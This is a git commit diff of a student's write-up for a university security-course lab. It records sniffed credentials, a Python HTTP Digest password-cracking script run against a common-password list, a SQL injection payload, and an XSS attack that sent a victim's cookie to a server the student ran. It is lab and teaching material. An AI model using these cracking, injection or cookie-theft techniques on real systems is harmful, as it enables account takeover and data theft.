From 5cd9365453d2326647a1e0ff66a8659164c6a1cf Mon Sep 17 00:00:00 2001 From: Matt Strapp Date: Sat, 11 Dec 2021 17:42:55 -0600 Subject: do more of ho2 Signed-off-by: Matt Strapp --- csci5271/ho2/writeup.md | 80 ++++++++++++++++++++++++++++++++++++++++++------- 1 file changed, 70 insertions(+), 10 deletions(-) (limited to 'csci5271') diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md index 5093b8d..e752fcb 100644 --- a/csci5271/ho2/writeup.md +++ b/csci5271/ho2/writeup.md @@ -1,6 +1,6 @@ -#1 +# 1 -##Packet +## Packet ``` IP 192.168.14.3.46826 > 192.168.14.1.80: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 1452909150 ecr 2428281190], length 142: HTTP: GET /secret/file HTTP/1.1 E.....@.@..............P.Tw.|..j........... @@ -11,16 +11,16 @@ User-Agent: curl/7.58.0 Accept: */* ``` -##User/Pass: +## User/Pass: `travis14:maivDecgur2202` -##Contents: +## Contents: ```html -

I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen.

-

— Dale Cooper

+I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen. +- Dale Cooper ``` -#2 -##Packet +# 2 +## Packet ``` 182203 IP 192.168.14.2.36586 > 192.168.14.1.80: Flags [P.], seq 91:464, ack 308, win 501, options [nop,nop,TS val 422351445 ecr 1957960104], length 373: HTTP: HEAD /secret/cheese HTTP/1.1 E.....@.@..v...........P,.................. @@ -31,7 +31,67 @@ User-Agent: curl/7.58.0 Accept: */* ``` -##Crack +## Crack ```python +# HTTP Digest Authentication cracker import hashlib -``` \ No newline at end of file + +username = "travis14" +realm = "Cheese" +nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640" +uri = "/secret/cheese" +qop = "auth" +nc = "00000001" +cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=" +response = "872aafc461761e417d2df47b85e43d2b" + +# Calculate the response +with open("10k-most-common.txt") as f: + for line in f: + line = line.strip('\n').strip() + ha1 = hashlib.md5((username + ":" + realm + ":" + line).encode('utf-8')).hexdigest() + ha2 = hashlib.md5(("HEAD" + ":" + uri).encode('utf-8')).hexdigest() + response = hashlib.md5((ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2).encode('utf-8')).hexdigest() + # print(line + ":" + response) + if (response == "872aafc461761e417d2df47b85e43d2b"): + print("Password: " + line) + break + +``` +## Password +`Password: domain` + +##Contents: +``` +Intelligence alone is not nearly enough when it comes to acting wisely. + +— Fyodor Dostoevsky +``` + +# 3 +## Cookie +`Stephen2019-11-03T12%3A44%3A21Z` + +# 4 +The secret to figuring out the SQL injection was ~~trying everything~~ tuning the query to stop returning Error 500. + +## Request +`picture=char-kway-teow.jpg'+OR+1=1+AND'user=alice--` + +## Response +`The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)` + +# 5 + +## XSS +```html + +``` + +## Cookie +`GET /?cookie=auth=Iwillseeyouagainin32years. HTTP/1.1" 200 -` + +## Writeup +The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser. + +# 6 -- cgit v1.2.3